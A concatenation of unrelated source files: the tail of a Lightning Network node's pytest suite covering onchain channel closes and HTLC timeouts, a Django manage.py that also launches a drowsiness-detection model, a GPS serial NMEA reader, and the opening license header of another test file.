# 100 deep and l2 forgets.
bitcoind.generate_block(93)
sync_blockheight(bitcoind, [l1, l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# l1 does not wait for ignored payment.
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_fail")
def test_onchain_different_fees(node_factory, bitcoind, executor):
"""Onchain handling when we've had a range of fees"""
l1, l2 = node_factory.line_graph(2, fundchannel=True, fundamount=10**7,
opts={'may_reconnect': True})
l2.rpc.dev_ignore_htlcs(id=l1.info['id'], ignore=True)
p1 = executor.submit(l1.pay, l2, 1000000000)
l1.daemon.wait_for_log('htlc 0: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')
l1.set_feerates((16000, 7500, 3750))
p2 = executor.submit(l1.pay, l2, 900000000)
l1.daemon.wait_for_log('htlc 1: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')
# Restart with different feerate for second HTLC.
l1.set_feerates((5000, 5000, 3750))
l1.restart()
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')
p3 = executor.submit(l1.pay, l2, 800000000)
l1.daemon.wait_for_log('htlc 2: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')
# Drop to chain
l1.rpc.dev_fail(l2.info['id'])
l1.wait_for_channel_onchain(l2.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Both sides should have correct feerate
assert l1.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 16000
}]
assert l2.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 16000
}]
bitcoind.generate_block(5)
# Three HTLCs, and one for the to-us output.
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 4)
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
with pytest.raises(Exception):
p1.result(10)
with pytest.raises(Exception):
p2.result(10)
with pytest.raises(Exception):
p3.result(10)
# Two more for HTLC timeout tx to be spent.
bitcoind.generate_block(2)
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 3)
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_new_commit(node_factory, bitcoind, executor):
# Test case where we have two possible commits: it will use new one.
disconnects = ['-WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, new commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# OK, time out HTLC.
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
l2.daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
def setup_multihtlc_test(node_factory, bitcoind):
# l1 -> l2 -> l3 -> l4 -> l5 -> l6 -> l7
# l1 and l7 ignore and HTLCs they're sent.
# For each direction, we create these HTLCs with same payment_hash:
# 1 failed (CLTV1)
# 1 failed (CLTV2)
# 2 live (CLTV2)
# 1 live (CLTV3)
nodes = node_factory.line_graph(7, wait_for_announce=True,
opts={'dev-no-reconnect': None,
'may_reconnect': True})
# Balance by pushing half the funds.
b11 = nodes[-1].rpc.invoice(10**9 // 2, '1', 'balancer')['bolt11']
nodes[0].rpc.pay(b11)
nodes[0].rpc.dev_ignore_htlcs(id=nodes[1].info['id'], ignore=True)
nodes[-1].rpc.dev_ignore_htlcs(id=nodes[-2].info['id'], ignore=True)
preimage = "0" * 64
h = nodes[0].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)['payment_hash']
nodes[-1].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)['payment_hash']
# First, the failed attempts (paying wrong node). CLTV1
r = nodes[0].rpc.getroute(nodes[-2].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h)
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[0].rpc.waitsendpay(h)
r = nodes[-1].rpc.getroute(nodes[1].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h)
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[-1].rpc.waitsendpay(h)
# Now increment CLTV -> CLTV2
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
# Now, the live attempts with CLTV2 (blackholed by end nodes)
r = nodes[0].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h)
r = nodes[-1].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h)
# We send second HTLC from different node, since they refuse to send
# multiple with same hash.
r = nodes[1].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[1].rpc.sendpay(r, h)
r = nodes[-2].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-2].rpc.sendpay(r, h)
# Now increment CLTV -> CLTV3.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
r = nodes[2].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[2].rpc.sendpay(r, h)
r = nodes[-3].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-3].rpc.sendpay(r, h)
# Make sure HTLCs have reached the end.
nodes[0].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
nodes[-1].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
return h, nodes
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_ignore_htlcs")
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_onchain_multihtlc_our_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode goes onchain with n+1 channel.
nodes[mid].rpc.dev_fail(nodes[mid + 1].info['id'])
nodes[mid].wait_for_channel_onchain(nodes[mid + 1].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
# TODO Remove our reliance on HTLCs failing on startup and the need for
# this plugin
nodes[0].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[-1].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
# After at depth 5, midnode will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# The three outgoing HTLCs time out at 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# And three more for us to consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Depth 3 to consider it settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 100 it's all done (we didn't bother waiting for mid+1's
# spends, so that might still be going)
bitcoind.generate_block(97)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_ignore_htlcs")
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_onchain_multihtlc_their_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode+1 goes onchain with midnode channel.
nodes[mid + 1].rpc.dev_fail(nodes[mid].info['id'])
nodes[mid + 1].wait_for_channel_onchain(nodes[mid].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
# TODO Remove our reliance on HTLCs failing on startup and the need for
# this plugin
nodes[0].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[-1].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
# At depth 5, midnode+1 will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET')
# The three outgoing HTLCs time out at depth 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are at depths 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 5, mid+1 can spend HTLC_TIMEOUT_TX output.
bitcoind.generate_block(1)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# At depth 100 they're all done.
bitcoind.generate_block(100)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
nodes[mid + 1].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_htlc_in(node_factory, bitcoind, executor):
# Test case where we fail with unsettled incoming HTLC.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# l2 then gets preimage, uses it instead of ignoring
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1)
# OK, l1 sees l2 fulfill htlc.
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
bitcoind.generate_block(5)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(95)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(5)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_htlc_out(node_factory, bitcoind, executor):
# Test case where we fail with unsettled outgoing HTLC.
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
l1 = node_factory.get_node(options={'dev-no-reconnect': None})
# Feerates identical so we don't get gratuitous commit to update them
l2 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l2.daemon.wait_for_log('openingd-{} chan #1: Handed peer, entering loop'.format(l1.info['id']))
l2.fund_channel(l1, 10**6)
# This will fail at l2's end.
t = executor.submit(l2.pay, l1, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_logs([
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX \\(.*\\) after 6 blocks',
'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks'
])
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
# l1 then gets preimage, uses it instead of ignoring
l1.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
'THEIR_UNILATERAL/THEIR_HTLC')
# l2 sees l1 fulfill tx.
bitcoind.generate_block(1)
l2.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
t.cancel()
# l2 can send OUR_DELAYED_RETURN_TO_WALLET after 3 more blocks.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# Now, 100 blocks they should be done.
bitcoind.generate_block(95)
sync_blockheight(bitcoind, [l1, l2])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(3)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2)
# The funding change should be confirmed and our only output
assert [o['status'] for o in l1.rpc.listfunds()['outputs']] == ['confirmed']
l1.pay(l2, 200000000)
# Make sure l2 has received sig with 0 htlcs!
l2.daemon.wait_for_log('Received commit_sig with 1 htlc sigs')
l2.daemon.wait_for_log('Received commit_sig with 0 htlc sigs')
# Make sure l1 has final revocation.
l1.daemon.wait_for_log('Sending commit_sig with 1 htlc sigs')
l1.daemon.wait_for_log('Sending commit_sig with 0 htlc sigs')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# We fail l2, so l1 will reconnect to it.
l2.rpc.dev_fail(l1.info['id'])
l2.daemon.wait_for_log('Failing due to dev-fail command')
l2.wait_for_channel_onchain(l1.info['id'])
assert l1.bitcoin.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(l1.bitcoin.rpc.getrawmempool(False))
# l2 will send out tx (l1 considers it a transient error)
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET (.*) after 5 blocks')
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
== ['ONCHAIN:Tracking their unilateral close',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'])
def check_billboard():
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
return (
len(billboard) == 2
and billboard[0] == 'ONCHAIN:Tracking our own unilateral close'
and re.fullmatch(r'ONCHAIN:.* outputs unresolved: in 4 blocks will spend DELAYED_OUTPUT_TO_US \(.*:0\) using OUR_DELAYED_RETURN_TO_WALLET', billboard[1])
)
wait_for(check_billboard)
# Now, mine 4 blocks so it sends out the spending tx.
bitcoind.generate_block(4)
# onchaind notes to-local payment immediately.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
# Restart, should still be confirmed (fails: unwinding blocks erases
# the confirmation, and we don't re-make it).
l1.restart()
wait_for(lambda: (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']]))
# It should send the to-wallet tx.
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 100 after l1 sees tx, it should be done.
bitcoind.generate_block(95)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'] == [
'ONCHAIN:Tracking our own unilateral close',
'ONCHAIN:All outputs resolved: waiting 5 more blocks before forgetting channel'
])
# Now, 100 blocks l2 should be done.
bitcoind.generate_block(5)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
# Only l1 has a direct output since all of l2's outputs are respent (it
# failed). Also the output should now be listed as confirmed since we
# generated some more blocks.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
# Check that the all the addresses match what we generated ourselves:
for o in l1.rpc.listfunds()['outputs']:
txout = bitcoind.rpc.gettxout(o['txid'], o['output'])
addr = txout['scriptPubKey']['addresses'][0]
assert(addr == o['address'])
addr = l1.bitcoin.getnewaddress()
l1.rpc.withdraw(addr, "all")
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_shutdown(node_factory):
# Fail, in that it will exit before cleanup.
l1 = node_factory.get_node(may_fail=True)
if not VALGRIND:
leaks = l1.rpc.dev_memleak()['leaks']
if len(leaks):
raise Exception("Node {} has memory leaks: {}"
.format(l1.daemon.lightning_dir, leaks))
l1.rpc.stop()
@flaky
@unittest.skipIf(not DEVELOPER, "needs to set upfront_shutdown_script")
def test_option_upfront_shutdown_script(node_factory, bitcoind):
l1 = node_factory.get_node(start=False)
# Insist on upfront script we're not going to match.
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = "76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac"
l1.start()
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 1000000, False)
l1.rpc.close(l2.info['id'])
# l2 will close unilaterally when it dislikes shutdown script.
l1.daemon.wait_for_log(r'received ERROR.*scriptpubkey .* is not as agreed upfront \(76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac\)')
# Clear channel.
wait_for(lambda: len(bitcoind.rpc.getrawmempool()) != 0)
bitcoind.generate_block(1)
wait_for(lambda: [c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN'])
wait_for(lambda: [c['state'] for c in only_one(l2.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN'])
# Works when l2 closes channel, too.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 1000000, False)
l2.rpc.close(l1.info['id'])
# l2 will close unilaterally when it dislikes shutdown script.
l1.daemon.wait_for_log(r'received ERROR.*scriptpubkey .* is not as agreed upfront \(76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac\)')
# Clear channel.
wait_for(lambda: len(bitcoind.rpc.getrawmempool()) != 0)
bitcoind.generate_block(1)
wait_for(lambda: [c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN', 'ONCHAIN'])
wait_for(lambda: [c['state'] for c in only_one(l2.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN', 'ONCHAIN'])
# Figure out what address it will try to use.
keyidx = int(l1.db_query("SELECT intval FROM vars WHERE name='bip32_max_index';")[0]['intval'])
# Expect 1 for change address, 1 for the channel final address,
# which are discarded as the 'scratch' tx that the fundchannel
# plugin makes, plus 1 for the funding address of the actual
# funding tx.
addr = l1.rpc.call('dev-listaddrs', [keyidx + 3])['addresses'][-1]
# Now, if we specify upfront and it's OK, all good.
l1.stop()
# We need to prepend the segwit version (0) and push opcode (14).
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = '0014' + addr['bech32_redeemscript']
l1.start()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 1000000)
l1.rpc.close(l2.info['id'])
wait_for(lambda: sorted([c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']]) == ['CLOSINGD_COMPLETE', 'ONCHAIN', 'ONCHAIN'])
|
manage.py
|
#!/usr/bin/env python
"""
Copyright (c) 2019 - present AppSeed.us
"""
import os
import sys
from multiprocessing import Process
from detectDrowsiness import cnn
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'core.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
if sys.argv[1] == 'runserver':
p1 = Process(target=main)
p2 = Process(target=cnn)
p1.start()
p2.start()
p2.join()
else:
main()
|
__init__.py
|
import serial
import pynmea2
import threading
ser = None
lock = threading.Lock()
thread = None
gga = None
gsa = None
gsv = None
rmc = None
def get_gga():
with lock:
return gga
def __set_gga(val):
global gga
gga = val
def get_gsa():
with lock:
return gsa
def __set_gsa(val):
global gsa
gsa = val
def get_gsv():
with lock:
return gsv
def __set_gsv(val):
global gsv
gsv = val
def get_rmc():
with lock:
return rmc
def __set_rmc(val):
global rmc
rmc = val
def start(device):
global ser
global thread
ser = serial.Serial(device, 19200, timeout=1)
ser.write(str.encode("AT+CGNSPWR=1\n")) # turn on the power for GPS
# TODO: figure out if/why this is needed
ser.write(str.encode("AT+CGNSSEQ=\"RMC\"\n")) # define the last NMEA sentence that parsed
ser.write(str.encode("AT+CGNSTST=1\n")) # start gps streaming to serial
def read_data():
while True:
line = ser.read_until(str.encode("\n")).decode()
headers = {
"$GNGGA": __set_gga,
"$GPGSA": __set_gsa,
"$GPGSV": __set_gsv,
"$GNRMC": __set_rmc,
}
if line[:6] in headers.keys():
with lock:
headers[line[:6]](pynmea2.parse(line))
thread = threading.Thread(target=read_data)
thread.daemon = True
thread.start()
def stop():
with lock:
if ser is not None:
ser.write(str.encode("AT+CGNSTST=0\n"))
if thread is not None:
thread.stop()
|
test_local.py
|
# Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
